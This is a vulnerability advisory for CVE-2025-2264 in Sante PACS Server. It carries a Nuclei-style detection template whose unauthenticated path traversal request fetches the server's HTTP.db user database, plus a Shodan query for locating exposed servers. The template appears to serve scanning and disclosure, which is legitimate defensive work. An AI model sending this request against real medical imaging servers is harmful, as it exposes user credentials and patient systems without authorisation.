漏洞描述
A Path Traversal Information Disclosure vulnerability exists in "Sante PACS Server.exe". An unauthenticated remote attacker can exploit it to download arbitrary files on the disk drive where the application is installed.
CVE-2025-2264: Sante PACS Server.exe - Path Traversal Information Disclosure
PoC代码[已公开]
id: CVE-2025-2264
info:
name: Sante PACS Server.exe - Path Traversal Information Disclosure
author: DhiyaneshDK
severity: high
description: |
A Path Traversal Information Disclosure vulnerability exists in "Sante PACS Server.exe". An unauthenticated remote attacker can exploit it to download arbitrary files on the disk drive where the application is installed.
reference:
- https://www.tenable.com/security/research/tra-2025-08
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2025-2264
cwe-id: CWE-22
epss-score: 0.63971
epss-percentile: 0.98374
cpe: cpe:2.3:a:santesoft:sante_pacs_server:4.1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: santesoft
product: sante_pacs_server
shodan-query: http.favicon.hash:1185161484
tags: cve,cve2024,sante,pacs,lfi,vkev
http:
- raw:
- |
GET /assets/../../.HTTP/HTTP.db HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "contains_all(body, 'SQLite','TABLE USER','format')"
- "status_code == 200"
condition: and
# digest: 490a0046304402203437628ab703bd87d41d2f1d4a414d77b36e2716aafad08500f15361ccf9e44402200f95c29a9fbe875231ba634ae1f5fefcdb9b8fa5bad6e2129cbee1ec1a10526b:922c64590222798bb761d5b6d8e72950